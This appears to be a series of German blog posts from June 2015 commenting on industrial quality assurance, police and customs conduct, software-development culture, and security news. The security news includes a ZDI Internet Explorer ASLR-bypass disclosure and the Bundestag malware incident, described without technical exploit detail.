Apropos Qualität: wenn mal wieder ein paar tausend Teile zu sortieren sind, dann greift man auf Leiharbeiter zurück. Leiharbeiter von externen QS-Firmen die den Leuten dann wie üblich das Blaue vom Himmel versprechen. Die Verantwortung der Entwickler, des Managements, der Produktionsplanung usw. wird hier auch auf den Schultern prekär Beschäftigter abgeladen. Wenn, wie mehrfach erlebt, ein Teamleiter oder ein Papierschubster einen Fehler gemacht hat, wird die Verantwortung auf "die Externen" geschoben. Die sind ja eh nicht motiviert, fahren 100 km jeden Tag für 11,80€/h und überhaupt - wer richtige Arbeit will der bekommt sie auch (nicht meine Meinung, das ist Konsens vieler Festangestellter).
Was ich sagen will ist, dass die schön sortierten Kabel im Auto nur Teil des Werbeheftchens sind. Wir in der Industrie wissen genau wie man sich unter Vorgaben wegduckt, ob die Teile jetzt für zensiert sind oder ganze Autos. Außerdem wird schon so sehr gespart, dass die eigentliche Wertschöpfung (tatsächliche Arbeit) nicht mehr den Wert schöpft der dem (End-)Kunde abverlangt wird.
Anstatt sich auf das eigentliche Produkt zu konzentrieren (der Code in Deinem Fall), wird mehr Energie darauf verwendet zu schummeln und den halbgaren Zustand des Produkts mit Heftchen, wertbefreiten Zertifikaten und schicken Videos doch noch an den Endverbraucher durchzureichen.
Diese Zustände habe ich in einigen namhaften Betrieben erlebt. Ich weiß von Kollegen aus anderen Firmen, dass es dort auch so läuft.
Ich hoffe, das ist jetzt allgemein genug, dass da niemand mit Repressalien bedroht ist. Hoffentlich werde ich heute nacht gut schlafen können *grusel*
Update: Ein anderer Kommentar zu der Problematik:
Ich arbeite bei einem Automobilzulieferer (Mechatronik).
Ein bischen von dieser Problematik kann ich bestätigen, es wird viel Zeit mit Audits und Qualitätsdokumenten verbraten, die man besser in die Entwicklung der Produkte gesteckt hätte. Praktisch alle Probleme, die man durch hochgejubelte Qualitätsmethoden findet, hätte man auch mit der Methode des scharfen Hinsehens gefunden. Wenn man denn nur Zeit dafür hätte.
Aber: Im Grunde genommen ist das alles Jammern auf höchstem Niveau. Genauso, wie man Tempolimits von 30 aufhängt, damit die Leute nicht schneller als 70 fahren, erschlägt man Qualitätsprobleme mit jeder Menge Audits und Zertifizierungen, in der Hoffnung dass schon was hängenbleibt. Und tatsächlich ist die Qualität in Deutschland erheblich besser als anderswo, wenn ich sehe was die in Osteuropa oder in China so treiben (um nur mal zwei Beispiele zu nennen), dann schlafe ich hier nachts problemlos. Ich denke auch oft, das kann doch nicht wahr sein, dass so ein Mist durchrutscht, wieso hat keiner den Fehler gesehen, aber wenn ich unsere Arbeit mit der aus anderen Teilen der Welt vergleiche, oder auch mit kleinen deutschen Firmen, dann wird mir bewußt, wie sorgfältig und strukturiert hier gearbeitet wird, wie gut die Dokumentation ist, usw.
Die Gefahr, dass ich durch eines unserer Produkte zu Schaden komme, ist mit Sicherheit deutlich geringer, als dass ich in der Dusche ausrutsche und mir den Hals breche, davon bin ich überzeugt.
[l] Zu dem Swatting-Fall haben sich die Dinge schnell bewegt. Der Betroffene hat schnell auf reddit seine Beschreibung der Lage weggemacht und einen "ich will da lieber niemanden ärgern"-Absatz hingetan. Da denkt man sich ja schon, dass das möglicherweise was damit zu tun hat, wie er von den Polizei behandelt wurde. Ich habe davon kein Backup, aber er hat inzwischen ein Video publiziert, wo er das erzählt. Wer keine Zeit hat, sich Videos anzuschauen, für den paste ich mal die Zusammenfassung des Einsenders:
Nachdem er mit seinem Fahrzeug angehalten wurde, wurde er umgehend herausgezerrt, auf den Boden gedrückt und in Handschellen gesteckt, das ganze Prozedere inklusive Finger umknicken und Schulter auskugeln. Dann wurde er zur Wache gefahren, ihm wurden die üblichen Fernseh-Cop-Fragen gestellt (wo waren Sie gestern, wem gehört das Auto, was ist Ihre Beziehung zu der Person, der das Auto gehört…), danach wurde er in eine Zelle gesperrt. Dort kam alle paar Minuten jemand vorbei, um sicher zu gehen, dass alles in Ordnung ist (meine Hoffnung stieg). Wesentlich später kam dann ein Polizist, der ihn bat, eine freiwillige Urinprobe abzugeben, was Doc verweigerte (hätte ich auch, ohne Drogen genommen zu haben); darauf hin drohte ihm der Polizist damit, dass er sich dann eben einen richterlichen Beschluss besorgen würde, um stattdessen eine Blutprobe zu bekommen, weil Doc ja offensichtlich nervös wäre und unter Drogeneinfluss stünde. Zum Zweck der Legitimierung wurde eine Ärztin heranbestellt, die einige Tests durchführte (auf einem Bein stehen und von 1030 bis 1000 herunterzählen, Finger zusammenführen…) und zu dem Ergebnis kam, dass es keinen Anlass für einen Bluttest gäbe. Also mussten sie ihn gehen lassen.
Während seines gesamten Aufenthalts dort durfte er im Übrigen keinen Anwalt anrufen, weil es sich ja nur um eine "routinemäßige Verkehrskontrolle" handele.
Das krönende Abschluss war dann, dass Doc natürlich zu seinem Auto zurück musste. Da wurde er an die Bahn verwiesen, ohne dass er genau wusste, wo er überhaupt genau festgenommen worden war. Er könne auch gerne erst zurück nach Hause fahren, aber was in der Zwischenzeit mit dem Auto passierte, ob es wegen falschen Parkens abgeschleppt oder ausgeraubt würde (ich schätze mal, die Polizisten haben nicht extra die Tür für ihn abgeschlossen), wäre nicht das Problem der Polizei.
Der Punkt an dieser Stelle ist, dass man üblicherweise bei Polizeigewalt den Eindruck hat, das Opfer sei schon irgendwie zu Recht verdächtigt worden. Sowas wie "lief zur falschen Zeit im Görlitzer Park rum, als die Polizei einen Drogen-Bust durchführte" oder "Fußballfan, Beifang bei Hooligan-Verhaftung" oder "war bei einer Disco-Schlägerei in der Crowd". Hier war nichts davon der Fall. Der Typ fuhr auf der Autobahn mit seinem Auto.
Ebenfalls nicht präsent war mir, dass die Polizei, wenn man sie wegen dieser Handhabung anzeigt, automatisch eine Gegenanzeige wegen Widerstands gegen die Staatsgewalt stellt, die man effektiv garantiert verliert, weil Aussage gegen Aussage der Polizei steht. Es ist also offenbar vorgesenen, dass man als Geschädigter einen solchen Fall gewinnen kann (und eine Enschuldigung bekommen kann - yay), aber in der Praxis ist das wegen des oben genannten Problems nicht zu erwarten. Eher das Gegenteil.
Sehr gruselig. (Danke, Daniel)
[l] Über die letzten Jahren haben eigentlich alle Sicherheitsbehörden der Bundesrepublik Deutschland und der Bundesländer der Reihe nach so dramatisch versagt, dass man niemandem mehr trauen kann. Nur der Zoll hat sich bisher ganz gut gehalten. Wie sich jetzt rausstellt, sah das bloß so aus.
Was die Staatsanwaltschaft als "großen Schlag gegen den internationalen Handel von unversteuerten Zigaretten" gepriesen hatte, könnte vor Gericht scheitern. Grund dafür ist das teilweise wohl rechtswidrige Vorgehen der Zollfahnder.
Oha, das klingt ja ominös! Was ist denn da passiert?
"Vermeintlich ordnungsgemäß sichergestellte Beweismittel" dürften im Prozess womöglich nicht verwendet werden, sagte Weiß in der Verhandlung. Einige Zollfahnder verhedderten sich bei ihren Aussagen derart, dass ihnen der Richter einen Zeugenbeistand beiordnete. Es bestand die Gefahr, dass die Beamten sich selbst strafrechtlich belasteten.
Oooooh! Das fordere ich ja seit Jahren, dass die Richter mal konsequent Beweismittel vor Gericht nicht zulassen, wenn die rechtswidrig erlangt wurden! Das freut mich ja sehr, wenn das ein Richter macht! Leider ist das, wenn ich das richtig verstehe, innerhalb der Diskretion des Richters, ob er solche Beweise zulässt oder nicht. In den USA ist das klar geregelt. Wenn die Durchsuchung illegal war, dann sind die Beweismittel nicht zulässig. Punkt. Und plötzlich haben die Behörden einen Anreiz, sich an Recht und Gesetz zu halten!
Konkret haben die Zöllner eine "zufällige" Kontrolle gemacht, die sah aber nur zufällig aus. Sie kannten den Fahrzeugtyp und das Kennzeichen und zogen das gezielt raus. Eigentlich braucht man dann einen richterlichen Durchsuchungsbefehl, aber den haben sie nicht mal zu beantragen versucht. Das sei so üblich, sagten sie vor Gericht. Da gebe es so gar eine Dienstanweisung für.
Und woher wussten sie die Details? Weil sie eine Telefonüberwachung durchgeführt hatten! War euch das bewusst, dass der Zoll Telefonüberwachungen durchführen kann? Jetzt wisst ihr's!
Und jetzt wird es richtig unappetitlich. Die haben nämlich für die Telefonüberwachung einen richterlichen Beschluss beantragt und gekriegt, am Amtsgericht Darmstadt. Das lief über die Staatsanwaltschaft in Darmstadt. Und die wurde nach einem Jahr (!) ergebnisloser Telefonüberwachung (!!) langsam ungeduldig. Also hat der Zoll … nein, nicht aufgegeben, sie haben einen "bis dahin unbedeutenden Mittäter zum Hauptverdächtigen" gemacht und da war dann eine andere Staatsanwaltschaft zuständig, die in Hanau, und dann haben sie halt da weiter gemacht. Natürlich ohne dem Richter die Vorgeschichte zu erzählen.
Der Richter in Hanau hat schon angesagt, dass er das eher nicht erlassen hätte, wenn er die Vorgeschichte gekannt hätte. Den Rest müsst ihr selber lesen. Da erklären sie dann, wieso die Gerichtsverhandlung jetzt in Hanau in einem Kongresszentrum stattfindet, in einem Saal, der sonst für Theateraufführungen und Konzerte benutzt wird. m( (Danke, Daniel)
[l] Ein Hinweis noch zu Softwareentwicklung (siehe auch). Ich bin da wahrscheinlich voreingenommen, weil ich Software entwickle. Dennoch.
Mein Eindruck ist, dass Softwareentwicklung in der Industrie immer mehr als Randdetail betrachtet wird. Die Werbung prügelt da ja auch immer in die selbe Richtung. "Mit diesem Produkt wird alles NOCH VIEL EINFACHER!" Da kann man dem Management schon nachsehen, wenn die glauben, das sei alles total einfach. So viele Evolutionssprünge in Richtung "jetzt NOCH EINFACHER!1!!" wie wir schon gemacht haben. Und es stimmt ja auch. Damals unter DOS hatten wir keinen Speicherschutz und mussten Swapping selber implementieren! Damals unter C, wenn wir da einen Zeiger verlegt haben, dann gab es Speicherkorruption! Damals in den Schützengräben, wenn wir da einen Datenblock freizugeben vergaßen, dann leakte der Speicher!! Kann man sich heute gar nicht mehr vorstellen!1!!
Scherz beiseite: Heutzutage liegt der Fokus bei Leuten, die über die Entwicklung von Software reden, häufig auf Management-Dingen. Sowas wie Extreme Programming. In der Ausbildung (der Hinweis kam gerade per Mail rein, und ich gebe das gerne weiter) wird der Eindruck erweckt, man klickt sich in seinem UML-Tool ein Flowchart zusammen, und dann ist die Software fertig. Das tatsächliche Hinschreiben ist dann ein niederer Akt, den kann man ja auch einer Outsourcing-Firma in Indien überlassen.
Dieser Ansatz ist bei Software genau so falsch wie bei allen anderen Dingen. Ganze Industriezweige haben sich inzwischen dem Management und der Qualitätskontrolle von per Outsourcing hergestellten Produkten verschrieben. Der Westen macht überhaupt nur noch Management und Qualitätskontrolle, die Produkte machen die Billiglohnländer. Bei Software ist das noch nicht so, aber wenn man sich Fachzeitschriften durchliest, könnte man den Eindruck gewinnen.
Ich sehe das so: Der Code ist am Ende das Produkt. Nicht der Plan für den Code. Nicht die Broschüren. Nicht die Meetings. Der Code.
Die Kern-Sorge in der Softwareentwicklung sollte daher auch der Code sein.
Die Maßstäbe sollten wie in anderen Ingenieursdisziplinen auch sein. Elektriker legen Kabel ja auch nicht wild in der Gegend herum. Wenn ihr mal bei einem Auto die Motorhaube aufmacht, dann kommt euch ja auch kein Kabelsalat entgegengequollen. Das ist alles so ausgelegt, dass man es schnell und unkompliziert warten kann. Bei Code sollte man das auch so tun.
Dementsprechend ist Code auch nicht fertig, wenn die Funktionalität da ist. Das ist nur der erste Prototyp. Code ist fertig, wenn niemandem im Team ein Weg einfällt, irgendetwas daran besser zu machen.
Übrigens, nochmal als Nachschlag zu dem anderen Softwareentwicklungs-Artikel. Wenn ihr ein System optimieren wollt, dann empfehle ich, da mit der Frage heranzugehen: Wie kriege ich das mindestens doppelt so schnell? Gar nicht mit Klein-Klein aufhalten. Guckt euch das System an. Legt euch den Gedanken zurecht, dass die Konkurrenz das selbe Problem auf der selben Hardware in der halben Zeit löst, und ihr müsst das jetzt besser als die machen. Die größte Hürde beim Bessermachen ist, dass die Leute sich selbst einreden, das sei schon alles gut genug, oder es sei zu riskant, da jetzt für inkrementelle Verbesserungen den Code anzufassen. Wenn man wirklich was erreichen will, muss man da mental diesen Holzklotz aus dem Weg räumen, der einem sagt, soooo viel besser geht das gar nicht, dass sich jetzt der Aufwand lohnen würde. Zu der Feststellung kann man immer noch kommen. Aber das sollte am Ende der Überlegungen stehen, nicht am Anfang.
Update: Jetzt gehen hier diverse Mails ein, dass Elektriker ja inzwischen auch pfuschen, und dass Autos inzwischen so gebaut werden, dass sie eben nicht mehr wartbar sind, sondern man nur noch ganze Komponenten austauscht, und das auch nur geht, wenn man Spezialwerkzeug hat, das man nicht frei kaufen kann, sondern dass die nur an ihre Lizenzwerkstätten vergeben. Ja, weiß ich. Hatte gerade kein besseres Beispiel zur Hand. Nehmt es also als Verweis auf die guten alten Zeiten, wie sie früher mal waren, als alles besser war. Seufz.

Thu Jun 25 2015

[l] Beim Aufräumen habe ich hier gerade ein Essay über Softwareentwicklung gefunden, das ich im November 2014 geschrieben habe. Ich kann mich gerade nicht erinnern, wofür das war, aber es scheint nicht im Internet angekommen zu sein. Daher publiziere ich das jetzt halt mal hier:
Ich habe früh in meinem Leben mit Softwareentwicklung angefangen. Ich erinnere mich noch, wie ich in den 80er Jahren Weihnachtslieder in GW-BASIC programmiert habe, und eine sehr coole Benutzeroberfläche gebaut habe, bei der man mit den Pfeiltasten in einem Menü herumnavigieren konnte. Auf unserem Monochrom-Bildschirm in 80x25 sah das verdammt cool aus. Viel cooler als ein Großteil der anderen Software, die wir so im Einsatz hatten.
Damals wie heute nagte der Gedanke in mir, irgendwo könnte das irgendjemand irgendwo besser können als ich. Also nicht im Sinne von: Der hat mehr Zeit investiert und mehr Erfahrung und ist daher effizienter. Nein. Besser im Sinne von: Wenn der sähe, wie ich hier herumkrautern muss, um zu meinen Ergebnissen zu kommen, dann würde der ein lautes Lachen nur mit Mühe unterdrücken können.
Besonders ausgeprägt ist diese Befürchtung immer in Verbindung mit Rock-Star-Firmen und mit Weltkonzernen, deren Software eine markführende Position besetzt. Ich will das mal konkret machen. Wenn ich mich mit Google treffe und über Suchmaschinenprogrammierung rede, dachte ich, dann würden die gar nicht verstehen, wovon ich rede, weil das für die wäre als würden sie sich mit einer Ameise unterhalten. Oder, so die Annahme, mit VMware könnte ich gar nicht über Hypervisor-Programmierung reden, weil die da ja wahrscheinlich auf einem so viel höheren Niveau ein Verständnis aufgebaut haben, dass ein Gespräch mit jemandem wie mir für die keinen Sinn ergeben würde.
Nun hat es sich ergeben, dass ich beruflich Software auf Sicherheitslücken absuche. Ich gehe zu großen Firmen, die zeigen mir ihren Quellcode, und ich zeige ihnen dann, wo sie Dinge falsch machen. Wie viele Menschen in dem Beruf habe ich das Impostor Syndrome, d.h. ich befürchte regelmäßig, dass gleich jemand erkennt, dass ich gar keine Ahnung von der hier gefragten Wissens-Domain habe, und dann entfernt mich die Security aus dem Gebäude.
Einen besonders krassen Fall von Impostor Syndrom hatte ich, als ich das erste Mal bei Microsoft Windows auditiert habe. Die hatten auch keine Ahnung, wie man sowas macht, und wen man da ranlässt, und hatten daher ein vergleichsweise weites Netz geworfen, um potentielle Auditoren zu finden. Ich für meinen Teil hatte so gut wie keine Erfahrung mit Windows. Ich hielt das für einen Irrtum, dass die mich da hin geholt hatten. Und dann geschah das Wunder von Redmond. Ich setze mich hin, gänzlich ohne Domain Knowledge, und fand mehr Bugs als die ganzen Leute mit Domain Knowledge.
Wie sich rausstellt, ist Domain Knowledge überbewertet. Und Microsoft war sich dessen stärker bewusst als ich.
Aber diese Gedankengänge verfolgen mich bei allen Kunden. Was macht Microsofts GUI-Zeug zum Marktführer? Gibt es da irgendwas, was die besonders großartig machen? Wie funktioniert das Memory Management von Windows? Hat der Hypervisor von VMware ESX im Vergleich zu Xen Roswell-Technologie im Einsatz? Was ist eigentlich der Unterschied zwischen Oracle und MySQL? Ist das wirklich so ein immenser Abstand?
Gelegentlich ergibt sich die Gelegenheit, mit einigen wichtigen Leuten mal ein Bierchen trinken zu gehen. Ich nutze sowas konsequent, weil es mein Weltbild enorm erweitert hat über die Jahre.
Einige der gewonnenen Einsichten möchte ich gerne mit euch teilen. Bei allen großen, wichtigen Weltprodukten, bei denen ich eine Einsicht in diesen Aspekt gewinnen konnte, war das anfangs mal ein Hack von drei Leuten. Also wörtlich jetzt. Drei Leute ist die typische Größe, mit der man großartige Produkte bauen kann. Wenn wir nur von einem Aspekt reden, der am Ende die Großartigkeit des Produktes zementiert hat, ist es häufig gar nur einer. Der 32-bit-Support von Windows 95 geht auf einen Typen zurück, der das Manual von Intel auf dem Schreibtisch hatte (das konnte man sich damals für fast lau per Post ordern oder gratis als PDF runterladen), und der die entsprechenden Absätze gelesen hatte, und der sich dachte, hey, das implementiere ich doch mal.
Der schönste Spruch in diese Richtung kam von einem Datenbank-Hersteller. "Wenn wir damals Datenbank-Leute eingestellt hätten, wären die großartig darin gewesen, uns zu sagen, warum soundso nicht geht. Daher haben wir Nicht-Datenbank-Leute eingestellt, und die haben dann einen Weg gefunden."
In meiner Erfahrung ist der größte Motivator in der Softwareentwicklung die Gewissheit, dass etwas substantiell besser geht. Eine schöne Anekdote dazu hörte ich vor einer Weile. Da ging es darum, dass ein Software-Hersteller mit einer Uni zusammenarbeitete, und die hatten eine coole Idee und die auch umgesetzt im Rahmen einer Forschungsarbeit, und die blies alles aus dem Wasser, was es in dem Feld gegeben hatte. Der Hersteller hat daraufhin sein eigenes Team an einen Tisch geholt, wieder mal die fast sprichwörtlichen drei wirklich fitten Leute, und hat denen gesagt: implementiert das mal. Ihr habt das nicht erfunden, daher erwarten wir nicht, dass euer Prototyp diese Uni-Lösung outperformed, aber zumindest bis auf 50% solltet ihr rankommen. Die drei fitten Leute sind losgezogen und haben einen Prototypen gehackt, und hatten offensichtlich eine völlig falsche Vorstellung davon, welche Baseline sie erreichen müssen. Als sie ein paar Wochen/Monate gehackt hatten, und ihren Prototypen zeigten, und jemand den gegen das Uni-Ding auf gleicher Hardware benchmarkte, war der (edit: ihr Prototyp) nicht etwa 50% langsamer (edit: als die Uni-Software) sondern über 50% schneller.
Niemand geht los, um langsame Software zu schreiben. Aber auf dem Weg brechen viele Leute ab, weil ihnen gesagt wird, die Dinge seien "schnell genug".
Neulich scrollte eine lustige Gegenüberstellung an mir vorbei. Da hat sich einer der Väter von Extreme Programming vorgenommen, jetzt mal einen Sudoku-Löser zu programmieren. Der hat mehrere Blogposts dazu gemacht. Er hatte ein festes Dogma, wie man an sowas herangeht, aber offensichtlich keine Vorstellung, wie man diese Art Problem löst. In den Blogeinträgen beschreibt er jeweils, wie er Tests programmiert und ein neues Darstellungsformat ausprobiert. Am Ende scheitert er. Die Gegenüberstellung ist ein relativ bekannter Google-Ingenieur. Der hat auch ein Blogposting geschrieben. "Ich schreibe jetzt mal einen Sudoku-Löser". Dann hat er sich hingesetzt, beschrieben, wie man sowas macht, und einen Löser geschrieben. Ein Blogpost.
Es ist einfach, nach sowas über Extreme Programming zu lachen. Aber ich glaube, dass wir über noch ganz andere Dinge lachen sollten. Ich glaube, dass wir einige sehr fundamentale Dinge in Sachen Softwareentwicklung schlicht noch nicht verstanden haben. Nicht nur das: Die Leute setzen systematisch Scheuklappen auf, um zu verhindern, sich damit auseinandersetzen zu müssen.
Ich habe einmal einen Code Audit einer Webplattform gemacht. Normalerweise drücken sich Auditoren um sowas, weil man befürchten muss, dass sowas in PHP oder — schlimmer noch — Perl geschrieben ist. Das sind klassische Write-Only-Programmiersprachen. Da kann nach einer Woche auch der Typ, der es geschrieben hat, nicht mehr sagen, was dieser Code hier eigentlich tun sollte. In diesem Fall war es Perl. Wir machten drei Kreuze und fingen an. Und jetzt der Schocker: Das war wunderbar lesbarer Perl-Code. Kommentiert. Minimal. Die Firma hatte beschlossen, dass das Verbessern von bestehendem Code genau so wertvoll ist wie das Schreiben neuen Codes. Eher noch wertvoller. Wenn ein Mitarbeiter inzwischen dazugelernt hat, dass man Problem X besser so löst als wie wir das damals gemacht haben, dann geht er hin und löst es so. Unlesbarer Code wurde konsequent nicht gedulded. Fiese Konstrukte wie eval waren verpönt und nur unter strikten Ausnahmeregelungen erlaubt. Dieser Perl-Code war besser auditierbar als der durchschnittliche C++-Code. Lektion: Es liegt nicht an der Programmiersprache. Es liegt daran, dass die Firma der Lesbarkeit von Code einen Wert zuweist.
Der oben erwähnte "war am Ende 50% schneller"-Code hat dem Management so gut gefallen, dass sie gesagt haben: Geil, shippen wir. Das war cooler Rockstar-Code, aber das war kein Produkt. Für eine Firma dieser Größe und Erfahrung war es kein Problem, aus dem Codehaufen ein Produkt zu machen, das technisch den Anforderungen genügte.
Aber wenn ich da jetzt als Auditor hinkomme und sage: Schaut mal hier, das ist eine schlechte Idee, ändert das mal lieber! Dann sagen die mir: Können wir nicht; Eine Änderung hier könnte unvorhergesehene Auswirkungen über das ganze Produkt haben. Das Risiko können wir nicht eingehen.
In fast allen Großkonzernen, in denen ich bisher Einblicke in diesen Aspekt gewinnen konnte, gibt es große Codemassen, deren Wartbarkeit Nahe Null ist. Weil die Firmen es nicht geschafft haben, ihre Mitarbeiter dazu zu motivieren, alten und schlechten Code Schritt für Schritt besser zu machen. Stattdessen gibt es üblicherweise eine Kultur des Drucks, neue Innovationen zu programmieren.
Es ist schockierend, wie wenige Jahre ins Land streichen mussten, bis aus einem innovativen Stück Rockstarcode ein unwartbarer Haufen Legacy geworden ist.
Zusammenfassung: Firmen überbewerten "wir müssen das ans Laufen bringen" und unterbewerten "wir müssen dafür sorgen, dass das auch wartbar ist". Es werden immense Geldmengen dafür verbrannt und Mitarbeiterberge damit verschlissen, ungepflegten alten Code weiter ungepflegt zu halten, aber noch Dinge ranzupflanschen. Ich glaube, wenn wir hier das Anreizsystem umdrehen könnten, könnten wir auf einen Schlag die Softwareentwicklung umkrempeln und Deutschland zum Weltmarktführer machen.
Update: Ich sollte vielleicht noch sagen, dass ich wirklich mit Google über Suchmaschinenprogrammierung geredet habe, und gesehen habe, wie in VMware der Hypervisor funktioniert. Nicht nur habe ich verstanden, wie die das machen, die haben das auch noch so gemacht, wie ich das auch gemacht hätte (bzw. habe; einen Hypervisor habe ich noch nicht programmiert, aber eine Suchmaschine. Stellt sich raus, dass die groben Strukturen, was man so für Datenstrukturen verwendet und so, bei Google und mir die selben waren. Na klar haben die auch noch ein paar Tricks, die ich nicht kannte). Das liegt nicht daran, dass ich ein toller Hecht bin, sondern dass fast alle Lösungen für fast alle Probleme naheliegend sind, wenn man ein bisschen über das Problem nachdenkt. Und dann gibt es jeweils noch Hardware-Einschränkungen, die bestimmen, welche Lösungsansätze überhaupt möglich oder zielführend sind. So viel bleibt da am Ende normalerweise nicht übrig. Ich halte es für ein wichtiges Ziel, dass Anwender den immer noch weit verbreiteten Respekt vor Software abbauen. Wenn man ein Haus hat, und zwei Zimmer, und man möchte gerne in der Mitte die Mauer weghaben und ein großes Zimmer haben, dann prüft man die Statik und dann macht man die Mauer weg. Wenn man anbauen will, baut man halt an. Da ist nichts magisches dran. Bei Software ist das auch so. Wenn Google ein Haus baut, dann brauchen sie dafür auch ein Fundament. Wenn Google ein selbstfahrendes Auto baut, dann hat das auch Räder. Und so sieht das bei Suchalgorithmen halt auch aus.
Update: Siehe auch
[l] Früher fuhr man auf Musik-Festivals, um der Zivilisation und ihren Vor- und Nachteilen zu entgehen. Heute fährt man hin und die Polizei scannt mal eben die Gesichter aller Besucher. Aus, äh, Sicherheitsgründen. Ach kommt, habt euch nicht so, das waren doch bloß 90000 Scans. Und überhaupt, was soll die Aufregung, das haben wir doch verdeckt gemacht. Das hätten die Leute gar nicht gemerkt, wenn da jetzt nicht ein paar Blogger Sommerloch spielen würden!1!!

Tue Jun 23 2015

[l] Im "Stern" gibt es eine unscharfe Verschwörungstheorie über Schily, die Rothschild-Bank und Funktionäre des Diktators von Kasachstan. Hier ist ein konkretes Detail:
Genauer bekannt ist, welche Deals Otto Schily mit den Kasachen schon gemacht hat. Der ehemalige Innenminister war im Jahr 2006 bei der Biometrie-Firma Safe ID Solutions eingestiegen, ging dort in den Aufsichtsrat. Ein Jahr später beteiligte sich – ohne dass das groß auffiel - der kasachische Staatsfonds an dem Unternehmen.
Oh, ach? Na sowas!
[l] Bei mir kamen heute mehrere verstörende Mails rein. Da behaupteten Leute, Philipp Ruch (einer der Macher vom Zentrum für politische Schönheit) sei ein U-Boot der Amerikaner, weil er 2011 für ein Flugverbot über Libyen eintrat, und das war damals auch Nato Talking Point. Völlig klar also: Uns wird hier, wie damals bei Cointelpro, von den Diensten ein U-Boot reingedrückt!1!!
Leute, haltet mal bitte den Ball ein bisschen flacher. Also mal unter der Annahme, dass wenigstens einer der Einsender ein echter Leser ist und nicht irgendein bezahlter Troll. Erstens ist der Vorwurf an den Haaren herbei gezogen. Zweitens, und das ist mir fast noch wichtiger, müssen wir alle mal aufhören, mit solchen Totschlag-Parolen zu operieren. Das ist ganz unterste Schublade. Viel zu schnell, viel zu leichtfertig werden heute Leute als "Antisemit", "Putin-Versteher" oder "der hat bei diesen Friedensdemos mitgemacht" gelabelt und dann nimmt man das als ausreichende Begründung dafür, sich nicht anzuhören, was derjenige zu sagen hat. Das geht so nicht. Egal was für ein Label das ist. Ja, auch Nazis, Antifas und Neocons muss man zuhören. Und Antideutschen. Denn wenn einer von denen ein Argument für ihre Position hat, das ich noch nicht kenne, und das mein Weltbild erschüttern würde, dann will ich das wissen! Je weiter weg der andere von den eigenen Positionen ist, desto wichtiger ist es, das man seine Argumente anhört.
Und, mal unter uns, "der hat bei Friedensdemos mitgemacht" sagt mehr über denjenigen aus, der das für eine Diffamierung hält, als über den, den es diffamieren soll.

Fri Jun 19 2015

[l] ZDI droppt mal eine Packung 0day auf Microsoft. Es geht um Internet Explorer.
Das Problem, um das es geht, ist dass man memprotect als Orakel benutzen kann, um ASLR auszuhebeln. ASLR heißt, dass Code nicht an vorhersagbare Stellen im Adressraum geladen wird, damit man in einem Exploit nicht einfach zu der Stelle springen kann, die tut, was man will. ASLR ist einer der Hauptgründe, wieso stabile Exploits heutzutage so teuer geworden sind.
ZDI hat dieses Problem gefunden, Beispiel-Code gemacht (!), und mit dem bei Microsoft sogar einen Award abgeräumt, oder ein Kopfgeld, wie immer man das nennen will.
Und jetzt droppen sie den 0day, weil Microsoft ihnen zu verstehen gegeben hat, dass sie das Problem nicht fixen wollen.
Was man dazu wissen muss, ist dass Microsofts Verständnis von solchen Bug Bounties ist, dass sie dann die Details "vom Markt genommen haben". Ich denke, dass Microsoft denen das Geld gegeben hat, in der Gewissheit, dass das dann nicht später veröffentlicht wird. Das könnte also noch Stress geben.
Wieso will denn Microsoft das Problem nicht fixen? Weil memprotect ihr Hack ist, um use-after-free-Bugs in IE zu fixen. Das können sie also jetzt nicht abschalten, um ASLR wieder ordentlich zu kriegen, ohne dass sie auch die ganzen use-after-free-Bugs wieder reaktivieren. Und von denen gab es anscheinend eine ganze Menge, denn sonst würde Microsoft das ja jetzt abschalten und fertig ist die Laube.
Ich beobachte sowas ja immer mit einer gewissen Häme aus der Ferne, wenn ein Security-Feature an einem Security-Problem Schuld ist. Das ist jetzt jedenfalls eine ganz beschissene Situation für alle Involvierten.
Stellt sich natürlich noch die Frage, ob man nicht memprotect so umbasteln kann, dass es nicht mehr als Orakel missbrauchbar ist. Ich vermute mal nicht, denn sonst hätten sie das wohl getan.
Ich bin ja kein Freund von so Exploit-Händlern, aber vor ZDI muss man an der Stelle echt den Hut ziehen. Die scheißen echt jedem in den Vorgarten, der seine Bugs nicht in akzeptablem Zeitrahmen fixt. Sogar ihrem aktuellen Eigentümer HP.

Wed Jun 17 2015

[l] Kurze Durchsage von Yasmin Fahimi, Generalsekretärin der SPD:
Von einer "kontroversen Debatte" spricht Generalsekretärin Yasmin Fahimi und hantiert schon jetzt mit jener Keule, die einst Franz Müntefering im Zoff über die Agenda 2010 gezückt hatte. "Die SPD ist zu klug, um wegen der Auslegung mehrerer Grundrechtsartikel ihre Regierungsfähigkeit aufs Spiel zu setzen." Auf gut Deutsch: Liebe Delegierte, gebt euren Widerstand auf, sonst müssen wir in die Opposition.
Früher wollte man noch in die Regierung, um etwas ändern zu können. Heute will man sich ändern, um in der Regierung zu bleiben.
Ich gebe ja der Agenda 2010 die Schuld an diesen Zuständen. Die wissen halt, was ihnen auf dem "Arbeitsmarkt" blüht, wenn sie aus der Regierung rausfliegen. Weil sie das selber alles kaputtgemacht haben. (Danke, Christian)

Fri Jun 12 2015

[l] Die bisher beste Theorie zu Kaspersky:
Was mich stutzig gemacht hat an der Sache ist, dass die Angreifer das volle 19MB exploit package verwendet haben sollen. Mit der Begründung, sie wären sich ja so sicher gewesen, nicht erwischt zu werden. (Die Risikoabschätzung denke ich schaut bei einer AV-Firma anders aus).
Theorie:
Das waren die Russen und haben den kompletten und aktuell verwendeten Angriffstoolkit der Amis damit veröffentlicht und lachen sich jetzt einen runter.

Thu Jun 11 2015

[l] Haha, hier hat jemand eine Informationsfreiheitsanfrage nach dem Bundestrojaner-Quellcode gemacht :-)

Wed Jun 10 2015

[l] Die Malwareapokalypse im Bundestag wird immer apokalyptischer.
Ich habe da ja mal einen Vorschlag zu machen: Machen wir es wie Belgien. Fahren wir die Regierung für ein-zwei Jahre runter. Es gibt noch eine Verwaltung, die das Tagesgeschäft führt, und in Notfällen kann man ein Notfall-Kabinett einberufen, aber ansonsten fährt man das einfach alles runter. Dann kann man in Ruhe die Software neu installieren, und von mir aus die Hardware tauschen (Hey, warum auch nicht!1!! Ich tausch ja auch immer meine Hardware, wenn ich zu faul zum Reinstallieren bin, und der Steuerzahler auf der Rechnung sitzen bleibt!). Wisst ihr was? Wenn wir schon dabei sind, können wir auch gleich die Parlamentarier austauschen. Ich kann mich gerade nicht erinnern, wann die zum letzten Mal nach ihrem Gewissen und nicht nach Fraktionszwang abgestimmt haben. Oder wann da mal jemand vor dem Abstimmen die Gesetzesentwürfe gelesen hat. Und sich Gedanken gemacht hat.
